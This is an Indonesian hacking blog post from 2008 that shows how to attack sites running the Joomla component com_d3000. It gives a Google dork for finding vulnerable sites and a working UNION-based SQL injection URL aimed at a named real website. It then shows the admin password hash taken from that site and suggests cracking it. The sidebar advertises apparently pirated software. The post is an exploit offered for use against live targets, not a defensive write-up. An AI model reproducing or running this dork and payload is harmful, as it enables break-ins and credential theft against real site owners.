Welcome !
Chat With Me
Labels
- TIPS N TRICK (8)
- DOWNLOAD (5)
- NEWS (4)
- HACKING (2)
- Black Blog Competition (1)
- DIARY (1)
- Djarum Black (1)
Blog Archive
Enoy Music
Monday, October 20, 2008
SQL Injection "com_d3000"
Begitu banyak versi untuk SQL injection vulnerability, kali ini gw ambil salah satu SQL injection dari milw0rm. Seperti umum nya SQL inject yaiut membuka nama admin dan password nya yang masih ter-encrypt hash MD5.
Buka google, lalu ketik dork berikut allinurl: "com_d3000"
Setekah itu bakal keluar banyak beberapa web yang siap untuk di inject :))
Contoh :
http://blackorwhite.nl/index.php?option=com_d3000&task=showtop20
Lalu inject dengan exploit berikut :
index.php?option=com_d3000&task=
showarticles&id=-99999/**/union/**/select/**/
0,username,pass_word/**/from/**/admin/*
Dan hasil nya seperti berikut :
http://blackorwhite.nl/index.php?option=
com_d3000&task=showarticles&id=-99999/**/union
/**/select/**/0,username,pass_word/**/from/**/admin/*
Tertera pada halaman nya nama user dan password, tapi masih te-encrypt.
admin : 4cb9c8a8048fd02294477fcb1a41191a
Untuk men-decrypt nya banyak tools" online maupun software yg biasa untuk crack hash MD5.
dork & exploit from : milw0rm
Subscribe to:
Post Comments (Atom)
Video Of The Day
Online Tools
Download Zone
- Adobe Photoshop CS3 Extended
- Asphalt 4 Elite Racing (240x320).jar
- ESET NOD32 Antivirus v3.0.667
- Fake Webcam 3.9
- Instalasi Kabel RJ45.pdf
- LimeWire PRO v.4.18.3 FINAL RETAIL
- Macromedia Flash 8 Portable
- Mozilla Firefox 4 Alpha (Minefield)
- Nero 8 Lite 8.1.1.0
- Speed Up My PC
- Winamp_Media_Tower_v11
- Winstep Xtreme 7.1
Message
Visitor
Search My Blog
0 comments:
Post a Comment